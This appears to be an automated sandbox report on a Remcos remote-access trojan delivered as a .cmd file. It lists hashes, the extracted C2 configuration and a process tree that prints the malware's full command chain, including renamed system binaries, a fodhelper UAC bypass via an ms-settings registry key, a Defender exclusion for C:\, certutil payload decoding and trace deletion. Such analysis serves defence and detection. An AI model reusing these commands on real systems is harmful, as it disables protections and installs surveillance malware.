Analysis

  • max time kernel
    147s
  • max time network
    150s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240508-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system
  • submitted
    11-05-2024 01:23

General

  • Target

    574f194754022d9834c8d1a4c4013c25ef678e3d36b39238f9583bab7d745dc8.cmd

  • Size

    2.4MB

  • MD5

    fe393a407b85b37633f9c2dc593801b4

  • SHA1

    ab6c1cc6fdc415738b74214db52d9805166a727b

  • SHA256

    574f194754022d9834c8d1a4c4013c25ef678e3d36b39238f9583bab7d745dc8

  • SHA512

    2a72142927ef087b47c3f3e3d80db96595b577aec50d6fff2ab57e4e434dfb9aa54fe2d37213e8d8b414340b6878365adfa29db4e75f6094d4698c60b92adf3f

  • SSDEEP

    49152:Xgx8XXdStPR/FS/ncG6aoiQUiujLb5DxUaeNFWoqMr:g

Malware Config

Extracted

Family

remcos

Botnet

NEWRemoteHost-APRILFILE

C2

www.pentegrasystem.com:9231

Attributes
  • audio_folder

    MicRecords

  • audio_record_time

    5

  • connect_delay

    0

  • connect_interval

    1

  • copy_file

    remcos.exe

  • copy_folder

    Remcos

  • delete_file

    false

  • hide_file

    false

  • hide_keylog_file

    false

  • install_flag

    false

  • keylog_crypt

    false

  • keylog_file

    logs.dat

  • keylog_flag

    false

  • keylog_folder

    remcos

  • mouse_option

    false

  • mutex

    Rmc-3A6IQD

  • screenshot_crypt

    false

  • screenshot_flag

    false

  • screenshot_folder

    Screenshots

  • screenshot_path

    %AppData%

  • screenshot_time

    10

  • take_screenshot_option

    false

  • take_screenshot_time

    5

Signatures

  • Remcos

    Remcos is a closed-source remote control and surveillance software.

  • Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) 14 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 26 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Kills process with taskkill 1 IoCs
  • Modifies registry class 5 IoCs
  • Runs ping.exe 1 TTPs 1 IoCs
  • Script User-Agent 2 IoCs

    Uses user-agent string associated with script host/environment.

  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\574f194754022d9834c8d1a4c4013c25ef678e3d36b39238f9583bab7d745dc8.cmd"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:3980
    • C:\Windows\System32\extrac32.exe
      C:\\Windows\\System32\\extrac32 /C /Y C:\\Windows\\System32\\cmd.exe "C:\\Users\\Public\\alpha.exe"
      2⤵
        PID:752
      • C:\Users\Public\alpha.exe
        C:\\Users\\Public\\alpha /c mkdir "\\?\C:\Windows "
        2⤵
        • Executes dropped EXE
        PID:216
      • C:\Users\Public\alpha.exe
        C:\\Users\\Public\\alpha /c mkdir "\\?\C:\Windows \System32"
        2⤵
        • Executes dropped EXE
        PID:4320
      • C:\Users\Public\alpha.exe
        C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\reg.exe "C:\\Users\\Public\\ger.exe"
        2⤵
        • Executes dropped EXE
        • Suspicious use of WriteProcessMemory
        PID:3412
        • C:\Windows\system32\extrac32.exe
          extrac32 /C /Y C:\\Windows\\System32\\reg.exe "C:\\Users\\Public\\ger.exe"
          3⤵
            PID:2400
        • C:\Users\Public\alpha.exe
          C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe "C:\\Users\\Public\\xkn.exe"
          2⤵
          • Executes dropped EXE
          • Suspicious use of WriteProcessMemory
          PID:5108
          • C:\Windows\system32\extrac32.exe
            extrac32 /C /Y C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe "C:\\Users\\Public\\xkn.exe"
            3⤵
              PID:3224
          • C:\Users\Public\alpha.exe
            C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\fodhelper.exe "C:\\Windows \\System32\\per.exe"
            2⤵
            • Executes dropped EXE
            • Suspicious use of WriteProcessMemory
            PID:1476
            • C:\Windows\system32\extrac32.exe
              extrac32 /C /Y C:\\Windows\\System32\\fodhelper.exe "C:\\Windows \\System32\\per.exe"
              3⤵
                PID:2388
            • C:\Users\Public\alpha.exe
              C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe
              2⤵
              • Executes dropped EXE
              • Suspicious use of WriteProcessMemory
              PID:1480
              • C:\Windows\system32\extrac32.exe
                extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe
                3⤵
                  PID:3324
              • C:\Users\Public\alpha.exe
                C:\\Users\\Public\\alpha /c C:\\Users\\Public\\xkn -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\"' ; "
                2⤵
                • Executes dropped EXE
                • Suspicious use of WriteProcessMemory
                PID:1260
                • C:\Users\Public\xkn.exe
                  C:\\Users\\Public\\xkn -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\"' ; "
                  3⤵
                  • Executes dropped EXE
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  • Suspicious use of WriteProcessMemory
                  PID:4056
                  • C:\Users\Public\alpha.exe
                    "C:\Users\Public\alpha.exe" /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d "C:\\Users\\Public\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:""
                    4⤵
                    • Executes dropped EXE
                    • Suspicious use of WriteProcessMemory
                    PID:4260
                    • C:\Users\Public\ger.exe
                      C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d "C:\\Users\\Public\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:""
                      5⤵
                      • Executes dropped EXE
                      • Modifies registry class
                      PID:2876
              • C:\Users\Public\alpha.exe
                C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\Users\Admin\AppData\Local\Temp\574f194754022d9834c8d1a4c4013c25ef678e3d36b39238f9583bab7d745dc8.cmd" "C:\\Users\\Public\\sppsvc.rtf" 9
                2⤵
                • Executes dropped EXE
                • Suspicious use of WriteProcessMemory
                PID:4064
                • C:\Users\Public\kn.exe
                  C:\\Users\\Public\\kn -decodehex -F "C:\Users\Admin\AppData\Local\Temp\574f194754022d9834c8d1a4c4013c25ef678e3d36b39238f9583bab7d745dc8.cmd" "C:\\Users\\Public\\sppsvc.rtf" 9
                  3⤵
                  • Executes dropped EXE
                  PID:3444
              • C:\Users\Public\alpha.exe
                C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\sppsvc.rtf" "C:\\Users\\Public\\Libraries\\sppsvc.pif" 12
                2⤵
                • Executes dropped EXE
                • Suspicious use of WriteProcessMemory
                PID:4112
                • C:\Users\Public\kn.exe
                  C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\sppsvc.rtf" "C:\\Users\\Public\\Libraries\\sppsvc.pif" 12
                  3⤵
                  • Executes dropped EXE
                  PID:4644
              • C:\Windows \System32\per.exe
                "C:\\Windows \\System32\\per.exe"
                2⤵
                • Checks computer location settings
                • Executes dropped EXE
                PID:2100
              • C:\Users\Public\alpha.exe
                C:\\Users\\Public\\alpha /c taskkill /F /IM SystemSettings.exe
                2⤵
                • Executes dropped EXE
                • Suspicious use of WriteProcessMemory
                PID:4304
                • C:\Windows\system32\taskkill.exe
                  taskkill /F /IM SystemSettings.exe
                  3⤵
                  • Kills process with taskkill
                  • Suspicious use of AdjustPrivilegeToken
                  PID:1816
              • C:\Users\Public\alpha.exe
                C:\\Users\\Public\\alpha /c ping 127.0.0.1 -n 2
                2⤵
                • Executes dropped EXE
                • Suspicious use of WriteProcessMemory
                PID:404
                • C:\Windows\system32\PING.EXE
                  ping 127.0.0.1 -n 2
                  3⤵
                  • Runs ping.exe
                  PID:4448
              • C:\Users\Public\Libraries\sppsvc.pif
                C:\Users\Public\Libraries\sppsvc.pif
                2⤵
                • Executes dropped EXE
                • Adds Run key to start application
                • Suspicious use of SetWindowsHookEx
                PID:2696
                • C:\Windows\SysWOW64\extrac32.exe
                  C:\\Windows\\System32\\extrac32.exe /C /Y C:\Users\Public\Libraries\sppsvc.pif C:\\Users\\Public\\Libraries\\Kpeyvroh.PIF
                  3⤵
                    PID:2080
                • C:\Users\Public\alpha.exe
                  C:\\Users\\Public\\alpha /c del /q "C:\Windows \System32\*"
                  2⤵
                  • Executes dropped EXE
                  PID:4892
                • C:\Users\Public\alpha.exe
                  C:\\Users\\Public\\alpha /c rmdir "C:\Windows \System32"
                  2⤵
                  • Executes dropped EXE
                  PID:4260
                • C:\Users\Public\alpha.exe
                  C:\\Users\\Public\\alpha /c rmdir "C:\Windows \"
                  2⤵
                  • Executes dropped EXE
                  PID:2344
                • C:\Users\Public\alpha.exe
                  C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\per.exe" / A / F / Q / S
                  2⤵
                  • Executes dropped EXE
                  PID:724
                • C:\Users\Public\alpha.exe
                  C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\ger.exe" / A / F / Q / S
                  2⤵
                  • Executes dropped EXE
                  PID:4752
                • C:\Users\Public\alpha.exe
                  C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\kn.exe" / A / F / Q / S
                  2⤵
                  • Executes dropped EXE
                  PID:4352
                • C:\Users\Public\alpha.exe
                  C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\sppsvc.rtf" / A / F / Q / S
                  2⤵
                  • Executes dropped EXE
                  PID:1308
                • C:\Users\Public\alpha.exe
                  C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\xkn.exe" / A / F / Q / S
                  2⤵
                  • Executes dropped EXE
                  PID:4616
              • C:\Windows\system32\SystemSettingsAdminFlows.exe
                "C:\Windows\system32\SystemSettingsAdminFlows.exe" OptionalFeaturesAdminHelper
                1⤵
                  PID:2864
                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --field-trial-handle=3704,i,14221647728265121051,6840906015709541562,262144 --variations-seed-version --mojo-platform-channel-handle=3792 /prefetch:8
                  1⤵
                    PID:4080

                  Network

                  MITRE ATT&CK Enterprise v15

                  Replay Monitor

                  Loading Replay Monitor...

                  Downloads

                  • C:\ProgramData\remcos\logs.dat

                    Filesize

                    144B

                    MD5

                    a6ff05ac646e82b0e34ea80ea07092a9

                    SHA1

                    864009b5fb94fa6dd59219ff98d77eb436e65071

                    SHA256

                    d80a09d159194443d25dd21cc224ee3929d60e484e903ff3b032ec1f55bab010

                    SHA512

                    733576e7b5dc9ae69facdc3a053c3437b4ac4aeb4f3f8ed360dd52ea4bd9b86d7417ca0f29da4d731d42f47defbc34ab9087796573c0138663cc1ae7ad0e87f3

                  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_f45hqlcz.04u.ps1

                    Filesize

                    60B

                    MD5

                    d17fe0a3f47be24a6453e9ef58c94641

                    SHA1

                    6ab83620379fc69f80c0242105ddffd7d98d5d9d

                    SHA256

                    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                    SHA512

                    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                  • C:\Users\Public\Libraries\sppsvc.pif

                    Filesize

                    819KB

                    MD5

                    5754d97e3293f5c2192a23ac5ab7670e

                    SHA1

                    fe32ef084fcb4fc4ad3ecdfa9662ac3002883928

                    SHA256

                    bdef908222a5df808151d1d383101e2049d3d995e564dd6d9345214fe3198800

                    SHA512

                    2c8c15c75d28e28499eecc9c8e8dab7b1c2507c9ced1bddd9ccb6998bc1b2f0cfbf2c763e6b98c8fba51e683585bbacd791b0740a040977c8788dedb4d433c50

                  • C:\Users\Public\alpha.exe

                    Filesize

                    283KB

                    MD5

                    8a2122e8162dbef04694b9c3e0b6cdee

                    SHA1

                    f1efb0fddc156e4c61c5f78a54700e4e7984d55d

                    SHA256

                    b99d61d874728edc0918ca0eb10eab93d381e7367e377406e65963366c874450

                    SHA512

                    99e784141193275d4364ba1b8762b07cc150ca3cb7e9aa1d4386ba1fa87e073d0500e61572f8d1b071f2faa2a51bb123e12d9d07054b59a1a2fd768ad9f24397

                  • C:\Users\Public\ger.exe

                    Filesize

                    75KB

                    MD5

                    227f63e1d9008b36bdbcc4b397780be4

                    SHA1

                    c0db341defa8ef40c03ed769a9001d600e0f4dae

                    SHA256

                    c0e25b1f9b22de445298c1e96ddfcead265ca030fa6626f61a4a4786cc4a3b7d

                    SHA512

                    101907b994d828c83587c483b4984f36caf728b766cb7a417b549852a6207e2a3fe9edc8eff5eeab13e32c4cf1417a3adccc089023114ea81974c5e6b355fed9

                  • C:\Users\Public\kn.exe

                    Filesize

                    1.6MB

                    MD5

                    bd8d9943a9b1def98eb83e0fa48796c2

                    SHA1

                    70e89852f023ab7cde0173eda1208dbb580f1e4f

                    SHA256

                    8de7b4eb1301d6cbe4ea2c8d13b83280453eb64e3b3c80756bbd1560d65ca4d2

                    SHA512

                    95630fdddad5db60cc97ec76ee1ca02dbb00ee3de7d6957ecda8968570e067ab2a9df1cc07a3ce61161a994acbe8417c83661320b54d04609818009a82552f7b

                  • C:\Users\Public\sppsvc.rtf

                    Filesize

                    1.6MB

                    MD5

                    0240edf5476c29058868d6c55171839e

                    SHA1

                    820845d637f7f3b97ce4c30e52db278dda37f955

                    SHA256

                    91b68a0e42f4ebeadd18b228353953cb34e1a86f7b88ac86895cac1be9c1ca5c

                    SHA512

                    9a0ce8ea056e2deb1b0fc0aa24c27298c27fa564ef51f122b2c142a776cf20a839b641d8b502c566f67172ee8e42009ae081fcbc8a4a9fc7c4c6939b0e57832e

                  • C:\Users\Public\xkn.exe

                    Filesize

                    442KB

                    MD5

                    04029e121a0cfa5991749937dd22a1d9

                    SHA1

                    f43d9bb316e30ae1a3494ac5b0624f6bea1bf054

                    SHA256

                    9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f

                    SHA512

                    6a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b

                  • C:\Windows \System32\per.exe

                    Filesize

                    48KB

                    MD5

                    85018be1fd913656bc9ff541f017eacd

                    SHA1

                    26d7407931b713e0f0fa8b872feecdb3cf49065a

                    SHA256

                    c546e05d705ffdd5e1e18d40e2e7397f186a7c47fa5fc21f234222d057227cf5

                    SHA512

                    3e5903cf18386951c015ae23dd68a112b2f4b0968212323218c49f8413b6d508283cc6aaa929dbead853bd100adc18bf497479963dad42dfafbeb081c9035459

                  • memory/2696-85-0x000000002D8A0000-0x000000002E8A0000-memory.dmp

                    Filesize

                    16.0MB

                  • memory/2696-110-0x000000002D8A0000-0x000000002E8A0000-memory.dmp

                    Filesize

                    16.0MB

                  • memory/2696-84-0x000000002D8A0000-0x000000002E8A0000-memory.dmp

                    Filesize

                    16.0MB

                  • memory/2696-75-0x0000000000400000-0x00000000004D5000-memory.dmp

                    Filesize

                    852KB

                  • memory/2696-87-0x000000002D8A0000-0x000000002E8A0000-memory.dmp

                    Filesize

                    16.0MB

                  • memory/2696-88-0x000000002D8A0000-0x000000002E8A0000-memory.dmp

                    Filesize

                    16.0MB

                  • memory/2696-89-0x000000002D8A0000-0x000000002E8A0000-memory.dmp

                    Filesize

                    16.0MB

                  • memory/2696-133-0x000000002D8A0000-0x000000002E8A0000-memory.dmp

                    Filesize

                    16.0MB

                  • memory/2696-101-0x000000002D8A0000-0x000000002E8A0000-memory.dmp

                    Filesize

                    16.0MB

                  • memory/2696-100-0x000000002D8A0000-0x000000002E8A0000-memory.dmp

                    Filesize

                    16.0MB

                  • memory/2696-81-0x000000002D8A0000-0x000000002E8A0000-memory.dmp

                    Filesize

                    16.0MB

                  • memory/2696-111-0x000000002D8A0000-0x000000002E8A0000-memory.dmp

                    Filesize

                    16.0MB

                  • memory/2696-121-0x000000002D8A0000-0x000000002E8A0000-memory.dmp

                    Filesize

                    16.0MB

                  • memory/2696-122-0x000000002D8A0000-0x000000002E8A0000-memory.dmp

                    Filesize

                    16.0MB

                  • memory/2696-132-0x000000002D8A0000-0x000000002E8A0000-memory.dmp

                    Filesize

                    16.0MB

                  • memory/4056-33-0x000001FF5B960000-0x000001FF5B982000-memory.dmp

                    Filesize

                    136KB